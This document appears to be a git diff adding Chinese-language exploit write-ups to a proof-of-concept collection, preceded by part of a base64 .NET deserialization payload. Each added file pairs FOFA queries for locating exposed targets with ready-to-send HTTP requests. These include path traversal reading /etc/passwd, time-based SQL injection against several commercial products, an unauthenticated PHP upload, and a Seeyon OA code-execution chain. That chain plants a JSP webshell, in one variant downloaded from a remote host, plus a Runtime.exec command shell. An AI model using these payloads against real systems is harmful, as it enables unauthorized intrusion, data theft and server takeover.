ZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws= + 0 + + + +``` + diff --git a/润乾报表dataSphereServlet接口存在任意文件读取漏洞.md b/润乾报表dataSphereServlet接口存在任意文件读取漏洞.md new file mode 100644 index 0000000..ad24f25 --- /dev/null +++ b/润乾报表dataSphereServlet接口存在任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# 润乾报表dataSphereServlet接口存在任意文件读取漏洞 + +润乾报表dataSphereServlet接口存在任意文件读取漏洞,可读取系统敏感文件导致数据泄露。 + +## fofa + +```yaml +body="/raqsoft" +``` + +## poc + +```yaml +POST /servlet/dataSphereServlet?action=11 HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +DNT: 1 +Sec-GPC: 1 +Connection: close +sec-ch-ua-platform: "macOS" +sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24" +sec-ch-ua-mobile: ?0 +Content-Length: 63 +Content-Type: application/x-www-form-urlencoded + +path=../../../../../../../../../../../etc/passwd&content=&mode= +``` + diff --git a/用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md b/用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md new file mode 100644 index 0000000..5031157 --- /dev/null +++ b/用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md @@ -0,0 +1,24 @@ +# 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞 + +用友NC 接口 `/ecp/productonsale/querygoodsgridbycode.json` 存在SQL注入漏洞 + +## fofa + +```yaml +app="用友-UFIDA-NC" +``` + +## poc + +```yaml +GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Pragma: no-cache +Accept-Language: zh-CN,zh;q=0.9 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Cache-Control: no-cache +``` + diff --git a/科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md b/科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md new file mode 100644 index 0000000..b9de2a6 --- /dev/null +++ b/科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞 + +科讯校园一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞,未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。 + +## fofa + +```yaml +body="http://www.ahkxsoft.com/" && body="一卡通登录" +``` + +## poc + +```yaml +GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + diff --git a/科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md b/科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md new file mode 100644 index 0000000..a349cf2 --- /dev/null +++ b/科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞 + +科讯校园一卡通管理系统get_kq_tj_today存在SQL注入漏洞,未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。 + +## fofa + +```yaml +body="http://www.ahkxsoft.com/" && body="一卡通登录" +``` + +## poc + +```yaml +GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + diff --git a/联软安渡系统接口queryLinklnfo存在SQL注入漏洞.md b/联软安渡系统接口queryLinklnfo存在SQL注入漏洞.md new file mode 100644 index 0000000..8fe40af --- /dev/null +++ b/联软安渡系统接口queryLinklnfo存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +# 联软安渡系统接口queryLinklnfo存在SQL注入漏洞 + +联软安渡UniNXG安全数据交换系统`/UniExServices/link/queryLinklnfo`存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞获取数据库用户数据。 + +## fofa + +```yaml +body="深圳市联软科技股份有限公司" +``` + +## poc + +```yaml +GET /UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Connection: close +``` + diff --git a/致远OA系统constDef接口存在代码执行漏洞.md b/致远OA系统constDef接口存在代码执行漏洞.md new file mode 100644 index 0000000..69ec9d2 --- /dev/null +++ b/致远OA系统constDef接口存在代码执行漏洞.md @@ -0,0 +1,180 @@ +# 致远OA系统constDef接口存在代码执行漏洞 + +## fofa + +```yaml +app="致远互联-OA" +``` + +## poc + +首先新建一个常量,constKey(常量名)为demo。 + +```yaml +/seeyon/constDef.do?method=newConstDef&constKey=demo&constDefine=1&constDescription=123&constType=4 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222340048.png) + +可以通过如下接口查看常量是否新建完成。 + +```java +/seeyon/ajax.do?method=ajaxAction&managerName=constDefManager&rnd=123123123&managerMethod=listPage&arguments=%5B%7B%22page%22%3A1%2C%22size%22%3A20%7D%2C%7B%7D%5D +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222340957.png) + +再新建一个常量,constType值为4表示常量类型为宏替换,在constDefine(常量定义)中引用常量demo,构造闭合造成代码执行。 + +```yaml +/seeyon/constDef.do?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22../webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder().decode(%22PCVvdXQucHJpbnRsbigiMjEzMjEzIik7JT4=%22)));%22&constDescription=123&constType=4 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222341930.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222342108.png) + + + +## 出网利用写webshell + +**Step1:** + +出网情况直接通过远程下载可以比较有效**Bypass Waf**方法。 + +```java +POST /seeyon/constDef.do HTTP/1.1 +Host: 172.16.135.220:8089 +accept: */* +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL= +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 545 + +method=newConstDef&constKey=uddd1&constDefine=new+File('../webapps/ROOT/test.jspx')+<<+new+URL('http%3a//192.168.43.81%3a18080/123.txt').text&constType=2 +``` + +![image-20240723205434737](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232054812.png) + +*** Step2:*** + +引用`Step1:`定义常量,构造闭合造成代码执行。 + +```java +POST /seeyon/constDef.do HTTP/1.1 +Host: 172.16.135.220:8089 +accept: */* +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL= +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 89 + +method=newConstDef&constKey=runtime1c2345accaccc&constDefine=evaluate+$uddd1&constType=3 +``` + +![image-20240723205550158](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232055225.png) + +**Step3:** + +通过`listConstDef`方法触发漏洞 + +```javascript +POST /seeyon/constDef.do HTTP/1.1 +Host: 172.16.135.220:8089 +accept: */* +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL= +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 35 + +method=listConstDef&page=1&rows=100 +``` + +![image-20240723205641905](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232056968.png) + + + +## 不出网情况 + + ***Step1:\*** + +把文件进行落地。 + +上传后的路径:**/base/upload/年/月/日/返回的id** + +例如:**/base/upload/2024/07/22/2101525989813472287** + +```bash +POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1 +Host: 172.16.135.236:8089 +Cookie: JSESSIONID=0D3102C6F8445B2207B3A29DF9C4BAE6 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=---------------------------1416682316313 +Content-Length: 1172 + +-----------------------------1416682316313 +Content-Disposition: form-data; name="type" + + +-----------------------------1416682316313 +Content-Disposition: form-data; name="extensions" + + +-----------------------------1416682316313 +Content-Disposition: form-data; name="applicationCategory" + + +-----------------------------1416682316313 +Content-Disposition: form-data; name="destDirectory" + + +-----------------------------1416682316313 +Content-Disposition: form-data; name="destFilename" + + +-----------------------------1416682316313 +Content-Disposition: form-data; name="maxSize" + + +-----------------------------1416682316313 +Content-Disposition: form-data; name="isEncrypt" + +false +-----------------------------1416682316313 +Content-Disposition: form-data; name="file1"; filename="tets.zip" +Content-Type: Image/x-zip-compressed + +<% Runtime.getRuntime().exec(request.getParameter("a"));%> +-----------------------------1416682316313-- +``` + +![image-20240723205817934](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232058005.png) + +Step2 + +通过读取本地文件,进行写入文件可以完美解决写入文件长度的长度 + +```bash +POST /seeyon/constDef.do HTTP/1.1 +Host: 172.16.135.220:8089 +accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL= +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 545 + +method=newConstDef&constKey=u6da&constDefine=new+File('../webapps/ROOT/gsl.jsp')+<<+new+File('../../base/upload/2024/06/06/2101525989813472287').text&constType=2 +``` + +后续两个步骤触发漏洞跟之前的**Step2**、**Step3**一样。 + +## 漏洞来源 + +- https://blog.csdn.net/LiangYueSec/article/details/140608564 +- https://www.t00ls.com/thread-72119-1-1.html \ No newline at end of file diff --git a/资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md b/资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md new file mode 100644 index 0000000..e8d90cf --- /dev/null +++ b/资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md @@ -0,0 +1,27 @@ +# 资管云comfileup.php前台文件上传漏洞(XVE-2024-18154) + + + +## poc + +```javascript +POST /comfileup.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0 +Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe +Upgrade-Insecure-Requests: 1 +Priority: u=1 +Content-Type: multipart/form-data; boundary=--------1110146050 +Content-Length: 117 + +----------1110146050 +Content-Disposition: form-data; name="file";filename="test.php" + +test +----------1110146050-- +``` + diff --git a/通天星CMSV6车载视频监控平台disable存在SQL注入.md b/通天星CMSV6车载视频监控平台disable存在SQL注入.md new file mode 100644 index 0000000..42783a7 --- /dev/null +++ b/通天星CMSV6车载视频监控平台disable存在SQL注入.md @@ -0,0 +1,24 @@ +# 通天星CMSV6车载视频监控平台disable存在SQL注入 + +通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。其`disable`存在SQL注入,恶意攻击者利用此漏洞向服务器写入恶意的后门文件,从而获取服务器权限。 + +## fofa + +```yaml +body="/808gps" +``` + +## Hunter + +```yaml +web.body="/808gps" +``` + +## poc + +```yaml +GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 +Host: +``` + +![image-20240721160542472](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407211605563.png) \ No newline at end of file diff --git a/锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md b/锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md new file mode 100644 index 0000000..eb51d13 --- /dev/null +++ b/锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md @@ -0,0 +1,10 @@ +# 锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞 + +未验证漏洞 + +## poc + +```yaml +/safety/ping.htm +``` + diff --git a/飞讯云MyImportData前台SQL注入(XVE-2024-18113).md b/飞讯云MyImportData前台SQL注入(XVE-2024-18113).md new file mode 100644 index 0000000..b0cec95 --- /dev/null +++ b/飞讯云MyImportData前台SQL注入(XVE-2024-18113).md @@ -0,0 +1,9 @@ +# 飞讯云MyImportData前台SQL注入(XVE-2024-18113) + +## poc + +```yaml +GET /MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN HTTP/1.1 +Host: ip +``` +